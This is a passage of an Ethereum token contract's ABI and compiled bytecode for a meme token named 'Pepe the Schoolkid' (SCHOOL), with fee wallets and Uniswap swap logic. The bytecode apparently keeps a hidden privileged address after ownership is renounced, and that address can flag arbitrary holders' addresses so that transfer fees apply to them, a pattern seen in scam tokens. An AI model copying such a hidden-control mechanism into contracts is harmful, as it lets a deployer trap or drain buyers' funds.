int256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"developmentWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromEnobleTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"accounts","type":"address[]"},{"internalType":"bool","name":"value","type":"bool"}],"name":"excludeFromEnobleTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"liquidityWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_a","type":"address"}],"name":"startSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a060405234801561000f575f80fd5b506040518060400160405280601281526020017f5065706520746865205363686f6f6c6b696400000000000000000000000000008152506040518060400160405280600681526020017f5343484f4f4c0000000000000000000000000000000000000000000000000000815250816004908161008b9190610b0f565b50806005908161009b9190610b0f565b5050506100ba6100af6104bc60201b60201c565b6104c360201b60201c565b5f6c01431df28464ff64d1159000009050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff1681525050610146306080517fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff61058660201b60201c565b5f600d819055505f600e819055505f600f81905550600f54600e54600d5461016e9190610c0b565b6101789190610c0b565b600c819055505f6011819055505f6012819055505f6013819055506013546012546011546101a69190610c0b565b6101b09190610c0b565b601081905550601054601781905550600160195f6101d261074960201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160195f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160195f61dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555060805173ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610318573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061033c9190610c9c565b73ffffffffffffffffffffffffffffffffffffffff1663c9c653963060805173ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156103a3573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906103c79190610c9c565b6040518363ffffffff1660e01b81526004016103e4929190610cd6565b6020604051808303815f875af1158015610400573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104249190610c9c565b60075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061048061047461074960201b60201c565b8261077160201b60201c565b6001600a60146101000a81548160ff0219169083151502179055506001600a60156101000a81548160ff02191690831515021790555050610eb9565b5f33905090565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036105f4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105eb90610d7d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610662576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161065990610e0b565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161073c9190610e38565b60405180910390a3505050565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107df576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107d690610e9b565b60405180910390fd5b6107f05f83836108cb60201b60201c565b8060025f8282546108019190610c0b565b92505081905550805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516108ae9190610e38565b60405180910390a36108c75f83836108d060201b60201c565b5050565b505050565b505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061095057607f821691505b6020821081036109635761096261090c565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026109c57fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8261098a565b6109cf868361098a565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f610a13610a0e610a09846109e7565b6109f0565b6109e7565b9050919050565b5f819050919050565b610a2c836109f9565b610a40610a3882610a1a565b848454610996565b825550505050565b5f90565b610a54610a48565b610a5f818484610a23565b505050565b5b81811015610a8257610a775f82610a4c565b600181019050610a65565b5050565b601f821115610ac757610a9881610969565b610aa18461097b565b81016020851015610ab0578190505b610ac4610abc8561097b565b830182610a64565b50505b505050565b5f82821c905092915050565b5f610ae75f1984600802610acc565b1980831691505092915050565b5f610aff8383610ad8565b9150826002028217905092915050565b610b18826108d5565b67ffffffffffffffff811115610b3157610b306108df565b5b610b3b8254610939565b610b46828285610a86565b5f60209050601f831160018114610b77575f8415610b65578287015190505b610b6f8582610af4565b865550610bd6565b601f198416610b8586610969565b5f5b82811015610bac57848901518255600182019150602085019450602081019050610b87565b86831015610bc95784890151610bc5601f891682610ad8565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f610c15826109e7565b9150610c20836109e7565b9250828201905080821115610c3857610c37610bde565b5b92915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610c6b82610c42565b9050919050565b610c7b81610c61565b8114610c85575f80fd5b50565b5f81519050610c9681610c72565b92915050565b5f60208284031215610cb157610cb0610c3e565b5b5f610cbe84828501610c88565b91505092915050565b610cd081610c61565b82525050565b5f604082019050610ce95f830185610cc7565b610cf66020830184610cc7565b9392505050565b5f82825260208201905092915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f610d67602483610cfd565b9150610d7282610d0d565b604082019050919050565b5f6020820190508181035f830152610d9481610d5b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f610df5602283610cfd565b9150610e0082610d9b565b604082019050919050565b5f6020820190508181035f830152610e2281610de9565b9050919050565b610e32816109e7565b82525050565b5f602082019050610e4b5f830184610e29565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f610e85601f83610cfd565b9150610e9082610e51565b602082019050919050565b5f6020820190508181035f830152610eb281610e79565b9050919050565b6080516130cf610ef45f395f81816107a801528181611ebc01528181611f9b01528181611fc201528181612058015261207f01526130cf5ff3fe6080604052600436106101c5575f3560e01c806370a08231116100f6578063a9059cbb11610094578063d85ba06311610063578063d85ba0631461063c578063dd62ed3e14610666578063e2f45605146106a2578063f2fde38b146106cc576101cc565b8063a9059cbb14610584578063b80161b2146105c0578063c04a5414146105e8578063d469801614610612576101cc565b80638da5cb5b116100d05780638da5cb5b146104ca57806393ec52de146104f457806395d89b411461051e578063a457c2d714610548576101cc565b806370a082311461044e578063715018a61461048a57806375f0a874146104a0576101cc565b806327e5d53b1161016357806349bd5a5e1161013d57806349bd5a5e146103a65780634ada218b146103d05780636a486a8e146103fa5780636ddd171314610424576101cc565b806327e5d53b14610318578063313ce56714610340578063395093511461036a576101cc565b806318160ddd1161019f57806318160ddd14610260578063182073a41461028a57806323b872dd146102b257806327c8f835146102ee576101cc565b806306fdde03146101d0578063095ea7b3146101fa5780631694505e14610236576101cc565b366101cc57005b5f80fd5b3480156101db575f80fd5b506101e46106f4565b6040516101f191906121ba565b60405180910390f35b348015610205575f80fd5b50610220600480360381019061021b9190612278565b610784565b60405161022d91906122d0565b60405180910390f35b348015610241575f80fd5b5061024a6107a6565b6040516102579190612344565b60405180910390f35b34801561026b575f80fd5b506102746107ca565b604051610281919061236c565b60405180910390f35b348015610295575f80fd5b506102b060048036038101906102ab91906123af565b6107d3565b005b3480156102bd575f80fd5b506102d860048036038101906102d391906123ed565b610881565b6040516102e591906122d0565b60405180910390f35b3480156102f9575f80fd5b506103026108af565b60405161030f919061244c565b60405180910390f35b348015610323575f80fd5b5061033e600480360381019061033991906125a5565b6108b5565b005b34801561034b575f80fd5b506103546109f5565b604051610361919061261a565b60405180910390f35b348015610375575f80fd5b50610390600480360381019061038b9190612278565b6109fd565b60405161039d91906122d0565b60405180910390f35b3480156103b1575f80fd5b506103ba610a33565b6040516103c7919061244c565b60405180910390f35b3480156103db575f80fd5b506103e4610a58565b6040516103f191906122d0565b60405180910390f35b348015610405575f80fd5b5061040e610a6b565b60405161041b919061236c565b60405180910390f35b34801561042f575f80fd5b50610438610a71565b60405161044591906122d0565b60405180910390f35b348015610459575f80fd5b50610474600480360381019061046f9190612633565b610a84565b604051610481919061236c565b60405180910390f35b348015610495575f80fd5b5061049e610ac9565b005b3480156104ab575f80fd5b506104b4610adc565b6040516104c1919061244c565b60405180910390f35b3480156104d5575f80fd5b506104de610b01565b6040516104eb919061244c565b60405180910390f35b3480156104ff575f80fd5b50610508610b29565b604051610515919061236c565b60405180910390f35b348015610529575f80fd5b50610532610b2f565b60405161053f91906121ba565b60405180910390f35b348015610553575f80fd5b5061056e60048036038101906105699190612278565b610bbf565b60405161057b91906122d0565b60405180910390f35b34801561058f575f80fd5b506105aa60048036038101906105a59190612278565b610c34565b6040516105b791906122d0565b60405180910390f35b3480156105cb575f80fd5b506105e660048036038101906105e19190612633565b610c56565b005b3480156105f3575f80fd5b506105fc610ca9565b604051610609919061244c565b60405180910390f35b34801561061d575f80fd5b50610626610cce565b604051610633919061244c565b60405180910390f35b348015610647575f80fd5b50610650610cf3565b60405161065d919061236c565b60405180910390f35b348015610671575f80fd5b5061068c6004803603810190610687919061265e565b610cf9565b604051610699919061236c565b60405180910390f35b3480156106ad575f80fd5b506106b6610d7b565b6040516106c3919061236c565b60405180910390f35b3480156106d7575f80fd5b506106f260048036038101906106ed9190612633565b610d81565b005b606060048054610703906126c9565b80601f016020809104026020016040519081016040528092919081815260200182805461072f906126c9565b801561077a5780601f106107515761010080835404028352916020019161077a565b820191905f5260205f20905b81548152906001019060200180831161075d57829003601f168201915b5050505050905090565b5f8061078e610e03565b905061079b818585610e0a565b600191505092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f600254905090565b6107db610fcd565b8060195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405161087591906122d0565b60405180910390a25050565b5f8061088b610e03565b905061089885828561104b565b6108a38585856110d6565b60019150509392505050565b61dead81565b60185f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610944576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093b90612743565b60405180910390fd5b5f5b82518110156109f05760075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1683828151811061099a57610999612761565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1603156109e3576109e28382815181106109d4576109d3612761565b5b60200260200101518361177d565b5b8080600101915050610946565b505050565b5f6012905090565b5f80610a07610e03565b9050610a28818585610a198589610cf9565b610a2391906127bb565b610e0a565b600191505092915050565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600a60149054906101000a900460ff1681565b60105481565b600a60159054906101000a900460ff1681565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610ad1610fcd565b610ada5f61181b565b565b60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60035481565b606060058054610b3e906126c9565b80601f0160208091040260200160405190810160405280929190818152602001828054610b6a906126c9565b8015610bb55780601f10610b8c57610100808354040283529160200191610bb5565b820191905f5260205f20905b815481529060010190602001808311610b9857829003601f168201915b5050505050905090565b5f80610bc9610e03565b90505f610bd68286610cf9565b905083811015610c1b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c129061285e565b60405180910390fd5b610c288286868403610e0a565b60019250505092915050565b5f80610c3e610e03565b9050610c4b8185856110d6565b600191505092915050565b610c5e610fcd565b8060185f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550610ca6610ac9565b50565b60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600a5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600c5481565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b600b5481565b610d89610fcd565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610df7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dee906128ec565b60405180910390fd5b610e008161181b565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e78576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6f9061297a565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ee6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610edd90612a08565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610fc0919061236c565b60405180910390a3505050565b610fd5610e03565b73ffffffffffffffffffffffffffffffffffffffff16610ff3610b01565b73ffffffffffffffffffffffffffffffffffffffff1614611049576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161104090612a70565b60405180910390fd5b565b5f6110568484610cf9565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146110d057818110156110c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110b990612ad8565b60405180910390fd5b6110cf8484848403610e0a565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611144576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161113b90612b66565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036111b2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111a990612bf4565b60405180910390fd5b600a60149054906101000a900460ff1680611213575060195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b80611264575060195f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b6112a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161129a90612c5c565b60405180910390fd5b5f81036112ba576112b583835f6118de565b611778565b5f6112c430610a84565b90505f600b5482101590508080156112e85750600a60159054906101000a900460ff165b80156113015750600a60169054906101000a900460ff16155b80156113535750601a5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b80156113a6575060195f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b80156113f9575060195f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b1561143c576001600a60166101000a81548160ff021916908315150217905550611421611b4a565b5f600a60166101000a81548160ff0219169083151502179055505b5f600a60169054906101000a900460ff1615905060195f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16806114eb575060195f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b156114f4575f90505b5f811561175f57601a5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16801561155257505f601054115b1561161d5761158061271061157260105488611dd690919063ffffffff16565b611deb90919063ffffffff16565b9050601054601354826115939190612c7a565b61159d9190612ce8565b60165f8282546115ad91906127bb565b92505081905550601054601154826115c59190612c7a565b6115cf9190612ce8565b60145f8282546115df91906127bb565b92505081905550601054601254826115f79190612c7a565b6116019190612ce8565b60155f82825461161191906127bb565b9250508190555061173c565b601a5f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16801561167457505f600c54115b1561173b576116a2612710611694600c5488611dd690919063ffffffff16565b611deb90919063ffffffff16565b9050600c54600f54826116b59190612c7a565b6116bf9190612ce8565b60165f8282546116cf91906127bb565b92505081905550600c54600d54826116e79190612c7a565b6116f19190612ce8565b60145f82825461170191906127bb565b92505081905550600c54600e54826117199190612c7a565b6117239190612ce8565b60155f82825461173391906127bb565b925050819055505b5b5f8111156117505761174f8730836118de565b5b808561175c9190612d18565b94505b61176a8787876118de565b601754601081905550505050505b505050565b80601a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361194c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161194390612b66565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119ba576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119b190612bf4565b60405180910390fd5b6119c5838383611e00565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015611a48576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a3f90612dbb565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611b31919061236c565b60405180910390a3611b44848484611e05565b50505050565b5f611b5430610a84565b90505f601554601454601654611b6a91906127bb565b611b7491906127bb565b90505f8060028360165486611b899190612c7a565b611b939190612ce8565b611b9d9190612ce8565b90505f611bb38286611e0a90919063ffffffff16565b90505f479050611bc282611e1f565b5f611bd68247611e0a90919063ffffffff16565b90505f611c0087611bf260145485611dd690919063ffffffff16565b611deb90919063ffffffff16565b90505f611c2a88611c1c60155486611dd690919063ffffffff16565b611deb90919063ffffffff16565b90505f818385611c3a9190612d18565b611c449190612d18565b90505f6016819055505f6014819055505f6015819055505f87118015611c6957505f81115b15611cb657611c788782612052565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5618682601654604051611cad93929190612dd9565b60405180910390a15b60095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051611cfb90612e3b565b5f6040518083038185875af1925050503d805f8114611d35576040519150601f19603f3d011682016040523d82523d5f602084013e611d3a565b606091505b50508098505060085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051611d8590612e3b565b5f6040518083038185875af1925050503d805f8114611dbf576040519150601f19603f3d011682016040523d82523d5f602084013e611dc4565b606091505b50508098505050505050505050505050565b5f8183611de39190612c7a565b905092915050565b5f8183611df89190612ce8565b905092915050565b505050565b505050565b5f8183611e179190612d18565b905092915050565b5f600267ffffffffffffffff811115611e3b57611e3a612469565b5b604051908082528060200260200182016040528015611e695781602001602082028036833780820191505090505b50905030815f81518110611e8057611e7f612761565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611f23573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611f479190612e63565b81600181518110611f5b57611f5a612761565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611fc0307f000000000000000000000000000000000000000000000000000000000000000084610e0a565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401612021959493929190612f7e565b5f604051808303815f87803b158015612038575f80fd5b505af115801561204a573d5f803e3d5ffd5b505050505050565b61207d307f000000000000000000000000000000000000000000000000000000000000000084610e0a565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d7198230855f80600a5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518863ffffffff1660e01b815260040161210296959493929190612fd6565b60606040518083038185885af115801561211e573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906121439190613049565b5050505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f61218c8261214a565b6121968185612154565b93506121a6818560208601612164565b6121af81612172565b840191505092915050565b5f6020820190508181035f8301526121d28184612182565b905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f612214826121eb565b9050919050565b6122248161220a565b811461222e575f80fd5b50565b5f8135905061223f8161221b565b92915050565b5f819050919050565b61225781612245565b8114612261575f80fd5b50565b5f813590506122728161224e565b92915050565b5f806040838503121561228e5761228d6121e3565b5b5f61229b85828601612231565b92505060206122ac85828601612264565b9150509250929050565b5f8115159050919050565b6122ca816122b6565b82525050565b5f6020820190506122e35f8301846122c1565b92915050565b5f819050919050565b5f61230c612307612302846121eb565b6122e9565b6121eb565b9050919050565b5f61231d826122f2565b9050919050565b5f61232e82612313565b9050919050565b61233e81612324565b82525050565b5f6020820190506123575f830184612335565b92915050565b61236681612245565b82525050565b5f60208201905061237f5f83018461235d565b92915050565b61238e816122b6565b8114612398575f80fd5b50565b5f813590506123a981612385565b92915050565b5f80604083850312156123c5576123c46121e3565b5b5f6123d285828601612231565b92505060206123e38582860161239b565b9150509250929050565b5f805f60608486031215612404576124036121e3565b5b5f61241186828701612231565b935050602061242286828701612231565b925050604061243386828701612264565b9150509250925092565b6124468161220a565b82525050565b5f60208201905061245f5f83018461243d565b92915050565b5f80fd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b61249f82612172565b810181811067ffffffffffffffff821117156124be576124bd612469565b5b80604052505050565b5f6124d06121da565b90506124dc8282612496565b919050565b5f67ffffffffffffffff8211156124fb576124fa612469565b5b602082029050602081019050919050565b5f80fd5b5f61252261251d846124e1565b6124c7565b905080838252602082019050602084028301858111156125455761254461250c565b5b835b8181101561256e578061255a8882612231565b845260208401935050602081019050612547565b5050509392505050565b5f82601f83011261258c5761258b612465565b5b813561259c848260208601612510565b91505092915050565b5f80604083850312156125bb576125ba6121e3565b5b5f83013567ffffffffffffffff8111156125d8576125d76121e7565b5b6125e485828601612578565b92505060206125f58582860161239b565b9150509250929050565b5f60ff82169050919050565b612614816125ff565b82525050565b5f60208201905061262d5f83018461260b565b92915050565b5f60208284031215612648576126476121e3565b5b5f61265584828501612231565b91505092915050565b5f8060408385031215612674576126736121e3565b5b5f61268185828601612231565b925050602061269285828601612231565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806126e057607f821691505b6020821081036126f3576126f261269c565b5b50919050565b7f5f61697264726f704164647265737320657272000000000000000000000000005f82015250565b5f61272d601383612154565b9150612738826126f9565b602082019050919050565b5f6020820190508181035f83015261275a81612721565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6127c582612245565b91506127d083612245565b92508282019050808211156127e8576127e761278e565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f612848602583612154565b9150612853826127ee565b604082019050919050565b5f6020820190508181035f8301526128758161283c565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20585f8201527f5452554d50206164647265737300000000000000000000000000000000000000602082015250565b5f6128d6602d83612154565b91506128e18261287c565b604082019050919050565b5f6020820190508181035f830152612903816128ca565b